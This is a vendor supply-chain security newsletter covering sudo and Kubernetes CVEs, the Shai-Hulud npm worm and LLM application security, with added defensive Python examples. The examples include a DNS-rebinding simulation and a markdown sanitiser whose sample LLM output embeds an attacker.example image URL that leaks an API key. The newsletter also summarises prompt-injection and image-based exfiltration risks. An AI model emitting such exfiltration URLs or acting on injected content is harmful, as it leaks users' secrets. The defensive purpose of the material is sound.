Cloud-Native Digest is your monthly overview of all things open-source, supply chain security, and more

This month, the software supply chain world was shaken by a major compromise in the npm ecosystem. The Shai-Hulud malware campaign has dominated industry headlines, and while you’ve likely seen the coverage, we’re taking a closer look. The Cloudsmith team hosted a deep-dive webinar, “Lessons from the npm Attack: How to Secure Dependencies with Artifact Management”, where they broke down what happened and shared actionable strategies to safeguard your software dependencies.

 

npm isn’t the only story making waves in open source. From RubyGems maintainers being removed from GitHub, to new OpenSSF guidance on AI code assistants, and the upcoming Helm v4 release, the past few weeks have been packed with significant developments. We’ll cover all of these and more, but first, make sure to watch our webinar and learn how to strengthen your defenses in the wake of the npm compromise.

 

As always, there's lots to discuss - feel free to view in browser if it's easier. Let’s jump in!

VULN ROUND UP 

 

Common Vulnerabilities & Exposures

Hijack sudo’s chroot option to run arbitrary commands as root
NVD: CVE-2025-32463

CISA has added five actively exploited vulnerabilities to its Known Exploited Vulnerabilities catalog, including a critical flaw in the sudo utility for Linux and Unix (CVE-2025-32463, CVSS 9.3). The sudo bug lets a local, unprivileged user gain root through the -R/--chroot option; the other four entries affect Adminer, Cisco IOS/IOS XE, Fortra GoAnywhere MFT and Libraesva ESG. Federal agencies must apply the vendor mitigations by October 20, 2025.
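As an added example (not code from the newsletter, CISA or the sudo project), a Python helper that parses `sudo --version` output and says whether the installed build falls in the affected range. The range it uses, 1.9.14 through 1.9.17 with the fix in 1.9.17p1, is taken from the sudo project's advisory and is the one assumption the code makes; the patch-level suffix (`p1`) is the detail most ad hoc version checks get wrong, so it is compared as a fourth component.

```python
import re
import subprocess

# Affected range for CVE-2025-32463 as stated in the sudo project's advisory
# (an assumption of this example, not something the newsletter states):
# 1.9.14 through 1.9.17 inclusive, fixed in 1.9.17p1. Versions are compared as
# (major, minor, micro, patch_level) so that 1.9.17 < 1.9.17p1.
FIRST_AFFECTED = (1, 9, 14, 0)
FIXED_IN = (1, 9, 17, 1)

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text):
    """'1.9.17p1', or the first line of `sudo --version` ('Sudo version 1.9.17p1'),
    becomes (1, 9, 17, 1); a release without a pN suffix gets patch level 0."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, micro, patch = m.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def is_chroot_vulnerable(version):
    """True when the version lies in [FIRST_AFFECTED, FIXED_IN)."""
    v = parse_sudo_version(version) if isinstance(version, str) else tuple(version)
    return FIRST_AFFECTED <= v < FIXED_IN


def format_version(v):
    """(1, 9, 17, 1) -> '1.9.17p1'; (1, 9, 17, 0) -> '1.9.17'."""
    return ".".join(map(str, v[:3])) + (f"p{v[3]}" if v[3] else "")


def installed_sudo_status():
    """(version, vulnerable) for the sudo binary on PATH, or None if there is none."""
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True,
                             text=True, check=False).stdout
    except FileNotFoundError:
        return None
    lines = out.splitlines()
    if not lines:
        return None
    v = parse_sudo_version(lines[0])
    return format_version(v), is_chroot_vulnerable(v)


if __name__ == "__main__":
    # Constructed sample strings covering both sides of the fix boundary.
    for sample in ["1.9.13p3", "1.9.14", "1.9.16p2", "1.9.17", "1.9.17p1"]:
        print(f"{sample:10} {'VULNERABLE' if is_chroot_vulnerable(sample) else 'ok'}")
    print("installed:", installed_sudo_status())
```

One caveat: distributions often backport the fix without bumping the upstream version string, so a "vulnerable" verdict from this check on a distro package should be confirmed against the package changelog or the distro's own advisory before it is treated as a finding.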

 

Bypass of Kubernetes API Server proxy TOCTOU
NVD: CVE-2020-8562

Our first Kubernetes vulnerability lets an authorised user reach private control-plane networks through the API server’s proxy when proxying via Node or StorageClass objects. The API server resolves the target hostname and checks that the address is not private, then connects by name, so a second DNS lookup can return a different, private address (a time-of-check/time-of-use race). It is rated Low severity, affects all Kubernetes versions and currently has no fix. The suggested mitigation is to put a caching resolver such as dnsmasq in front of the API server so that both lookups return the same answer; detection is limited to audit logs showing blocked connections.
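The check-then-connect race described above, reduced to a runnable Python sketch that is added here and is not Kubernetes code. The two resolver classes are constructed stand-ins for attacker-controlled DNS and for a caching resolver, the `dial` callback stands in for the real TCP connect, and `93.184.216.34` / `10.0.0.1` are arbitrary public and private addresses:

```python
import ipaddress


def is_private_address(ip):
    """The check a proxy applies before connecting: refuse loopback, link-local
    and private (RFC 1918 / ULA) ranges, where control-plane components listen."""
    addr = ipaddress.ip_address(ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local


class FlappingResolver:
    """Constructed stand-in for attacker-controlled DNS (not a real resolver):
    returns the scripted answers in order and repeats the last one after that.
    A very short TTL, or an authoritative server that rotates records, has
    the same effect in practice."""

    def __init__(self, answers):
        self._answers = list(answers)
        self.lookups = 0

    def resolve(self, hostname):
        answer = self._answers[min(self.lookups, len(self._answers) - 1)]
        self.lookups += 1
        return answer


class CachingResolver:
    """Mitigation in the spirit of the advisory's dnsmasq-with-caching advice:
    the first answer for a name is pinned for the life of this object, so the
    check and the connection cannot observe different records."""

    def __init__(self, upstream):
        self._upstream = upstream
        self._cache = {}

    def resolve(self, hostname):
        if hostname not in self._cache:
            self._cache[hostname] = self._upstream.resolve(hostname)
        return self._cache[hostname]


def vulnerable_proxy(hostname, resolver, dial):
    """The TOCTOU pattern: validate the address from one lookup, then dial by
    *name*, which performs a second lookup the attacker can answer differently."""
    if is_private_address(resolver.resolve(hostname)):      # time of check
        raise PermissionError(f"{hostname} resolves to a private address")
    return dial(resolver.resolve(hostname))                  # time of use


def hardened_proxy(hostname, resolver, dial):
    """Resolve once, validate that address, and dial exactly that address."""
    ip = resolver.resolve(hostname)
    if is_private_address(ip):
        raise PermissionError(f"{hostname} resolves to a private address")
    return dial(ip)


if __name__ == "__main__":
    dial = lambda ip: f"connected to {ip}"
    attacker_dns = lambda: FlappingResolver(["93.184.216.34", "10.0.0.1"])
    print("vulnerable:", vulnerable_proxy("evil.example", attacker_dns(), dial))
    print("hardened:  ", hardened_proxy("evil.example", attacker_dns(), dial))
    print("cached:    ", vulnerable_proxy("evil.example", CachingResolver(attacker_dns()), dial))
```

The fix and the mitigation address different layers: `hardened_proxy` removes the race from the code, while `CachingResolver` leaves the vulnerable code in place and instead makes the environment answer consistently, which is all an operator can do when no patch exists.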

 

Endpoint & EndpointSlice permissions allow cross-Namespace forwarding

NVD: CVE-2021-25740

This low-severity Kubernetes flaw lets an attacker with permission to create or edit Endpoints or EndpointSlices point a Service at backend IPs in other namespaces, so a LoadBalancer or Ingress forwards traffic to backends it should not reach, potentially bypassing NetworkPolicies. All versions are affected and there is no patch; the mitigation is to restrict write access to Endpoints and EndpointSlices and to audit Services with no selector, since those are the ones whose endpoints are written by hand. Update RBAC roles accordingly and review Ingress configurations to reduce exposure.
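An audit for the mitigation described above, added here as example code (not a Kubernetes or Cloudsmith tool): it finds selector-less Services and reports hand-written endpoint addresses that point into another namespace or carry no targetRef at all. The three inputs are constructed in the shape of `kubectl get ... -o json` output, and every namespace, name and IP in them is hypothetical.

```python
# Constructed `kubectl get services/endpoints/endpointslices -A -o json` output,
# trimmed to the fields the audit uses. All names and addresses are hypothetical.
SERVICES = {"items": [
    {"metadata": {"namespace": "team-a", "name": "web"},
     "spec": {"type": "ClusterIP", "selector": {"app": "web"}}},
    {"metadata": {"namespace": "team-a", "name": "metrics-proxy"},
     "spec": {"type": "ClusterIP"}},                         # no selector: manual endpoints
    {"metadata": {"namespace": "team-a", "name": "saas"},
     "spec": {"type": "ExternalName", "externalName": "api.example.com"}},
]}

ENDPOINTS = {"items": [
    {"metadata": {"namespace": "team-a", "name": "metrics-proxy"},
     "subsets": [{"addresses": [
         {"ip": "10.244.1.2",
          "targetRef": {"kind": "Pod", "namespace": "team-a", "name": "exporter-0"}},
         {"ip": "10.244.3.7",
          "targetRef": {"kind": "Pod", "namespace": "kube-system", "name": "kube-dns-abc"}},
     ]}]},
]}

ENDPOINTSLICES = {"items": [
    {"metadata": {"namespace": "team-a", "name": "metrics-proxy-x7k2q",
                  "labels": {"kubernetes.io/service-name": "metrics-proxy"}},
     "endpoints": [{"addresses": ["10.96.0.10"]}]},          # raw IP, no targetRef
]}


def selectorless_services(services):
    """(namespace, name) of Services whose endpoints are written by hand.
    ExternalName Services have no endpoints at all and are skipped."""
    return [(s["metadata"]["namespace"], s["metadata"]["name"])
            for s in services["items"]
            if s["spec"].get("type") != "ExternalName" and not s["spec"].get("selector")]


def _reason(namespace, target_ref):
    """Why an address on a selector-less Service deserves a look, or None."""
    if target_ref is None:
        return "raw IP with no targetRef"
    if target_ref.get("namespace", namespace) != namespace:
        return f"points into namespace {target_ref['namespace']}"
    return None


def audit_manual_endpoints(services, endpoints, endpointslices):
    """For every selector-less Service, report addresses that have no targetRef
    or whose targetRef lives in another namespace: both are what an attacker
    with Endpoints/EndpointSlice write access would create to reach a backend
    the Service's own namespace should not see."""
    watched = set(selectorless_services(services))
    findings = []
    # Endpoints objects share the Service's name and namespace.
    for ep in endpoints["items"]:
        key = (ep["metadata"]["namespace"], ep["metadata"]["name"])
        if key not in watched:
            continue
        for subset in ep.get("subsets") or []:
            for addr in subset.get("addresses") or []:
                reason = _reason(key[0], addr.get("targetRef"))
                if reason:
                    findings.append((key[0], key[1], addr["ip"], "Endpoints", reason))
    # EndpointSlices are linked to their Service by a label.
    for sl in endpointslices["items"]:
        ns = sl["metadata"]["namespace"]
        svc = sl["metadata"].get("labels", {}).get("kubernetes.io/service-name")
        if (ns, svc) not in watched:
            continue
        for ep in sl.get("endpoints") or []:
            for ip in ep.get("addresses") or []:
                reason = _reason(ns, ep.get("targetRef"))
                if reason:
                    findings.append((ns, svc, ip, "EndpointSlice", reason))
    return findings


if __name__ == "__main__":
    for ns, svc, ip, kind, reason in audit_manual_endpoints(SERVICES, ENDPOINTS, ENDPOINTSLICES):
        print(f"{ns}/{svc} ({kind}) -> {ip}: {reason}")
```

On a real cluster the three inputs are the parsed output of `kubectl get services -A -o json`, `kubectl get endpoints -A -o json` and `kubectl get endpointslices -A -o json`. The audit only surfaces candidates; the RBAC side of the mitigation is checked separately, for instance with `kubectl auth can-i create endpoints --as=<subject> -n <namespace>` for the subjects you care about.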

Webhook redirect in kube-apiserver

NVD: CVE-2020-8561

With a CVSS score of 4.1 (Medium), this flaw affects all versions of kube-apiserver: an actor who controls a MutatingWebhookConfiguration or ValidatingWebhookConfiguration can redirect the API server’s webhook requests to private networks, and if the log level is 10 the redirected responses and headers appear in the API server logs. Systems are vulnerable if --profiling is enabled and the attacker can read the process logs. Mitigation involves disabling profiling (--profiling=false), running with a log level below 10 and restricting kube-apiserver’s network access. No fix is available; detection relies on reviewing kube-apiserver logs.

IN THE NEWS

 

CI/CD Security

Python 3.14 – What you need to know

Source: Cloudsmith

Python 3.14, the stable, production-ready release suitable for all users, shipped on October 7th 2025. It brings a batch of useful build improvements, which the blog post unpacks. From 3.14 onwards, release artifacts no longer carry PGP signatures; verifiers should use Sigstore instead. Free-threaded mode (PEP 703), introduced in 3.13, has also undergone major enhancements. Check out what’s new in Python 3.14.

Open Source Turmoil: RubyGems Maintainers Kicked Off GitHub
Source: The New Stack

Ruby Central, the nonprofit steward of RubyGems, has sparked controversy by removing long-time volunteer maintainers from the project’s GitHub repositories and consolidating control under its staff. The move, explained as a response to fiduciary duty and security concerns over software supply chain risks, has been widely criticized by developers as a hostile takeover and a betrayal of community governance. Former maintainers, including Ellen Dash, condemned the loss of autonomy, while Ruby Central defended the action as temporary, citing legal liability, governance gaps, and the need for stronger security protocols. Despite promises of new agreements and improved communication, the decision has left the Ruby community divided and distrustful of the organization’s leadership.

 

Widespread Supply Chain Compromise Impacting npm Ecosystem

Source: CISA

CISA warned of a major npmjs.com supply chain attack involving the “Shai-Hulud” worm, which compromised over 500 packages by stealing developer credentials, exfiltrating them, and spreading rapidly through malicious package updates. The agency urged organisations to review dependencies, rotate credentials, enforce MFA, monitor for suspicious activity, block malicious domains, and strengthen GitHub security controls. If you’d like to learn more on this topic, check out our recent Cloudsmith webinar.

 

New attack vector emerged with ‘s1ngularity’ and ‘shai-hulud’ attacks
Source: Cloudsmith

The Cloudsmith blog details the emergence of the “s1ngularity” and “Shai-Hulud” attacks, which mark a serious escalation in npm supply chain threats. Unlike earlier incidents driven by phishing, these attacks exploited a vulnerable GitHub Action to steal npm publishing tokens, enabling credential harvesting and data exfiltration. Alarmingly, they also represent one of the first documented uses of AI command-line tools to identify and extract sensitive data. To defend against such threats, Cloudsmith advises blocking known malicious packages, auditing exposure, quarantining via Enterprise Policy Management, rotating credentials, and strengthening CI/CD and identity security practices.
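For the "review dependencies" step that both the CISA advisory above and the Cloudsmith write-up recommend, an added Python example (not CISA's or Cloudsmith's code) that audits an npm `package-lock.json` for three things: packages on a deny list, packages that declare an install-time lifecycle script (npm records this in the lockfile as `hasInstallScript`, and a postinstall hook is how the Shai-Hulud payload ran), and packages resolved from outside an approved registry. The lockfile, the deny-list entries and the registry host are all constructed for the demo.

```python
import json

# Constructed lockfile in the npm lockfileVersion 2/3 layout, where every
# installed package is a key under "packages". All package names, versions
# and the registry host are hypothetical.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"good-lib": "^2.1.0"}},
        "node_modules/good-lib": {
            "version": "2.1.0",
            "resolved": "https://npm.example.internal/good-lib/-/good-lib-2.1.0.tgz"},
        "node_modules/good-lib/node_modules/nested-lib": {
            "version": "0.9.1",
            "resolved": "https://registry.npmjs.org/nested-lib/-/nested-lib-0.9.1.tgz"},
        "node_modules/hooked-lib": {
            "version": "4.0.2",
            "resolved": "https://registry.npmjs.org/hooked-lib/-/hooked-lib-4.0.2.tgz",
            "hasInstallScript": True},
        "node_modules/denied-lib": {
            "version": "1.2.3",
            "resolved": "https://npm.example.internal/denied-lib/-/denied-lib-1.2.3.tgz"},
    },
})

# Hypothetical policy inputs: in practice the deny list comes from your scanner
# or registry policy, and the approved registry is your artifact manager.
DENY_LIST = {("denied-lib", "1.2.3")}
APPROVED_REGISTRY = "https://npm.example.internal/"


def package_name(path):
    """Lockfile keys are install paths: 'node_modules/a/node_modules/@s/b' -> '@s/b'."""
    return path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(lock_text, deny_list=DENY_LIST, approved_registry=APPROVED_REGISTRY):
    """Return (name, version, reason) for every entry that is on the deny list,
    declares an install-time lifecycle script, or was resolved from outside the
    approved registry. Nested (deduplicated-away) installs are included because
    they are keyed under their parent's node_modules path."""
    lock = json.loads(lock_text)
    if lock.get("lockfileVersion", 1) < 2:
        raise ValueError("lockfileVersion 1 has no 'packages' map; regenerate with npm >= 7")
    findings = []
    for path, entry in lock["packages"].items():
        if path == "":                      # the root project itself
            continue
        name, version = package_name(path), entry.get("version")
        if (name, version) in deny_list:
            findings.append((name, version, "on deny list"))
        if entry.get("hasInstallScript"):
            findings.append((name, version, "runs an install lifecycle script"))
        resolved = entry.get("resolved", "")
        if resolved and not resolved.startswith(approved_registry):
            findings.append((name, version, f"resolved outside approved registry: {resolved}"))
    return findings


if __name__ == "__main__":
    for name, version, reason in audit_lockfile(SAMPLE_LOCK):
        print(f"{name}@{version}: {reason}")
```

Two notes on using this. First, `hasInstallScript` is the signal worth acting on even when a package is not yet on any deny list: installing with `npm ci --ignore-scripts` blocks the hook entirely, and packages that genuinely need a build step can then be allowlisted one by one. Second, the registry check is what ties this to artifact management: if every `resolved` URL points at your own registry proxy, that proxy is the single place where quarantine and policy can be enforced.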

Kubernetes

Announcing Changed Block Tracking API support (alpha)
Source: Kubernetes.io

Kubernetes now offers alpha support for Changed Block Tracking (CBT), a feature that lets CSI storage drivers track changes at the block level between volume snapshots. This enables faster, more efficient incremental backups by only processing changed blocks rather than entire volumes. Currently supported for block volumes, CBT requires storage providers to implement specific CSI RPCs and an external snapshot metadata sidecar, while backup solutions must handle authentication, streaming, and processing of metadata. The feature reduces backup time, resource usage, and storage costs for large datasets.

 

Path To Releasing Helm v4
Source: Helm Blog

The first Alpha of Helm v4 has been released, marking the start of a development phase focused on stability while API-breaking changes may still occur. The Alpha period runs through September, inviting users and SDK developers to test features and provide feedback. October begins the Beta phase, concentrating on bug fixes and preparing for a stable release, with the first release candidate expected at the end of the month. The official Helm v4 release is planned for KubeCon NA 2025 in mid-November, six years after Helm v3 and ten years since Helm’s creation.

 

The Quiet Revolution in Kubernetes Security
Source: Dark Reading

Kubernetes security is often hampered by legacy Linux assumptions (full-featured OSes, shells, and mutable filesystems) that increase attack surfaces and clash with ephemeral, container-native workloads. Talos Linux reimagines this with a minimal, immutable, API-driven OS designed for Kubernetes, eliminating local access, drift, and unnecessary complexity. While it strengthens security, it challenges traditional compliance tools and frameworks, requiring CISOs to adapt policies and auditing approaches. Ultimately, Talos aligns the OS layer with modern cloud-native principles, reducing risk and enabling fully auditable, declarative infrastructure.

 

How Maintainer Burnout Is Causing a Kubernetes Security Disaster
Source: The New Stack

Kubernetes’ External Secrets Operator (ESO), a critical tool for securely managing secrets from external providers, is facing a severe crisis due to maintainer burnout. With only one active maintainer left, the project is essentially frozen. That means no updates, bug fixes, or security patches will be released until at least five maintainers step up. This exposes Kubernetes environments to potential security risks and highlights a growing problem in open source: vital projects often lack sustainable support, leaving critical infrastructure vulnerable unless the community actively intervenes.

AI, LLMs & MCP

New OpenSSF Guidance on AI Code Assistant Instructions
Source: OpenSSF

AI code assistants can accelerate development and suggest solutions, but they pose security risks because their outputs depend on user prompts and can include insecure code. To address this, the OpenSSF released the “Security-Focused Guide for AI Code Assistant Instructions,” created by experts from Microsoft, Google, Red Hat, and others. The guide emphasizes crafting clear, security-focused prompts to improve the correctness and safety of generated code. While AI assistants can still make mistakes, better prompts lead to more secure results. This guide is a practical resource, complemented by an upcoming OpenSSF course on safely using AI code assistants, helping developers harness AI to improve software security.

 

Whitepaper: A Practical Guide for Building Robust AI/ML Pipeline Security
Source: OpenSSF

This OpenSSF whitepaper is exciting for developers because it marks a pivotal moment in extending the proven lessons of DevSecOps into the fast-growing world of AI/ML. Just as DevSecOps transformed software security by embedding protections directly into the development lifecycle, this paper introduces MLSecOps - a framework for integrating security into MLOps. By addressing the unique risks of AI/ML systems, such as model evolution, complexity, and opacity, it provides a roadmap for building trustworthy and resilient applications. The paper not only outlines a clear, layered approach but also leverages powerful open source tools like SLSA, Sigstore, and OpenSSF Scorecard, while highlighting future opportunities to close gaps in securing the AI/ML lifecycle. It’s a forward-looking guide that empowers developers to innovate with AI/ML confidently and securely.

 

Extending Supply Chain Governance to AI and ML Artifacts
Source: Cloudsmith

Organisations are rapidly adopting ML models and datasets from public sources, but unmanaged AI artifacts introduce security, compliance, and governance risks in the software supply chain. Cloudsmith’s ML Model Registry treats models and datasets as first-class artifacts (versioned, audited, and policy-controlled), allowing teams to maintain integrity, trace provenance, and enforce compliance while integrating seamlessly with existing DevOps workflows, including Hugging Face. This approach enables faster AI-driven innovation without creating blind spots or unmanaged risk.

 

Practical LLM Security Advice from the NVIDIA AI Red Team
Source: Nvidia Developer

Over several years, NVIDIA’s AI Red Team has identified common security risks in AI applications, especially LLM-based systems. The top vulnerabilities include: executing LLM-generated code without proper isolation, which can lead to remote code execution; insecure access control in retrieval-augmented generation (RAG) data stores, which can expose sensitive data or allow indirect prompt injection; and rendering active content from LLM outputs, which can exfiltrate data via images or links. Addressing these issues—by avoiding unsafe code execution, enforcing strict RAG permissions, and sanitizing or restricting active content—significantly improves LLM application security.
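The third of NVIDIA's findings, rendering active content, as an added Python example (written for this digest, not NVIDIA's code): a sanitiser that rewrites markdown from an LLM before the client renders it, so that images from non-allowlisted hosts, links to non-allowlisted hosts and raw HTML cannot carry data out in a URL. The sample model output and the allowlisted hosts are constructed.

```python
import re
from urllib.parse import urlparse

# Hosts whose content the client may fetch or follow. Assumption for the demo;
# in practice these are hosts you operate, because even an allowed host receives
# whatever the model puts into the query string.
ALLOWED_HOSTS = {"static.example.internal", "docs.example.internal"}

# Constructed LLM output: a summary plus an image that would auto-fetch on
# render (exfiltrating the secret in its URL), a link carrying the same secret,
# a legitimate link and image, and a raw HTML tag.
SAMPLE_OUTPUT = (
    "Summary complete. ![](https://attacker.example/p.png?d=API_KEY_abc123) "
    "See [the runbook](https://docs.example.internal/runbook) and "
    "[this](http://attacker.example/?d=API_KEY_abc123). "
    "![logo](https://static.example.internal/logo.png) "
    '<img src="https://attacker.example/i">'
)

IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
LINK_RE = re.compile(r'(?<!!)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
HTML_TAG_RE = re.compile(r"<[^>]+>")   # also eats a literal "<...>"; acceptable here


def host_allowed(url, allowed):
    """Only https to an allowlisted host passes; javascript:, data: and http: fail."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in allowed


def defang(url):
    """Keep the destination readable to a human without being fetchable or clickable."""
    return url.replace("http", "hxxp", 1)


def neutralize_active_content(text, allowed=ALLOWED_HOSTS):
    """Return (safe_text, findings). Images are the one element a client fetches
    with no user action, so non-allowlisted ones become a plain placeholder;
    non-allowlisted links become plain text with the defanged URL visible;
    raw HTML is removed outright."""
    findings = []

    def image_sub(m):
        alt, url = m.group(1), m.group(2)
        if host_allowed(url, allowed):
            return m.group(0)
        findings.append(("image", url))
        return f"[image removed: {alt or 'untitled'} -> {defang(url)}]"

    def link_sub(m):
        label, url = m.group(1), m.group(2)
        if host_allowed(url, allowed):
            return m.group(0)
        findings.append(("link", url))
        return f"{label} ({defang(url)})"

    out = IMAGE_RE.sub(image_sub, text)      # images first, so the link pass never sees them
    out = LINK_RE.sub(link_sub, out)
    out, removed = HTML_TAG_RE.subn("", out)
    if removed:
        findings.append(("html", removed))
    return out, findings


if __name__ == "__main__":
    safe, found = neutralize_active_content(SAMPLE_OUTPUT)
    print(safe)
    for kind, detail in found:
        print(f"blocked {kind}: {detail}")
```

The findings list is worth logging: an LLM that emits an image URL with a secret in the query string is either being prompt-injected or has seen data it should not have, and that is a detection signal for the RAG access-control problem in the same NVIDIA list, not just a rendering issue.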

COMMUNITY

 

Events & Meet-ups

Meet us at GitHub Universe 2025

Date/Time: October 28-30th, 2025

Catch Cloudsmith on the 2nd Floor of Gateway Pavilion! Learn how we can help you control your artifacts, secure your supply chain, and distribute software anywhere, all in one cloud-native platform. Fill out the form to request a discount pass or book a 1:1 meeting with our team.

 

More Trust, Less Boo! Haunt-Free Deployments with Cloudsmith & Kusari

Date/Time: Thursday, 30th October @ 5 PM GMT

Don’t let hidden threats slow you down. Discover how Cloudsmith & Kusari enable proactive security to prevent tampering, improve visibility, and speed deployments, ultimately reducing rework and strengthening your software supply chain. In this joint webinar from Cloudsmith and Kusari, our experts will show you how to turn security from a bottleneck into a force multiplier.

 

Lessons from the npm Attack: How to Secure Dependencies with Artifact Management

Date/Time: On-demand

In this webinar, Cloudsmith experts Cristian Garcia and Gwen Burchell will analyze the recent npm supply chain attacks, including the 's1ngularity' and 'shai-hulud' incidents, to uncover critical lessons for securing open-source dependencies. They'll share practical strategies for reducing risk without slowing development, emphasizing the importance of proactive security measures throughout the software lifecycle.

 

From CVE Scores to Action: Enforcing Artifact Management Policies in OPA

Date/Time: On-demand

If you missed our recent virtual webinar on vulnerability scoring systems, don’t worry - the session can be watched on demand at the link above. It helps developers and DevOps teams think through the existing vulnerability scoring systems, such as CVSS and EPSS, and shows how fixable vulnerabilities can be isolated and prioritised using Cloudsmith’s enterprise implementation of OPA.

Signed, sealed, and delivered - see you next issue.

Nigel Douglas


Head of Developer Relations

Cloudsmith

Cloudsmith, 7 Donegall Square West, Belfast, Northern Ireland BT1 6JH
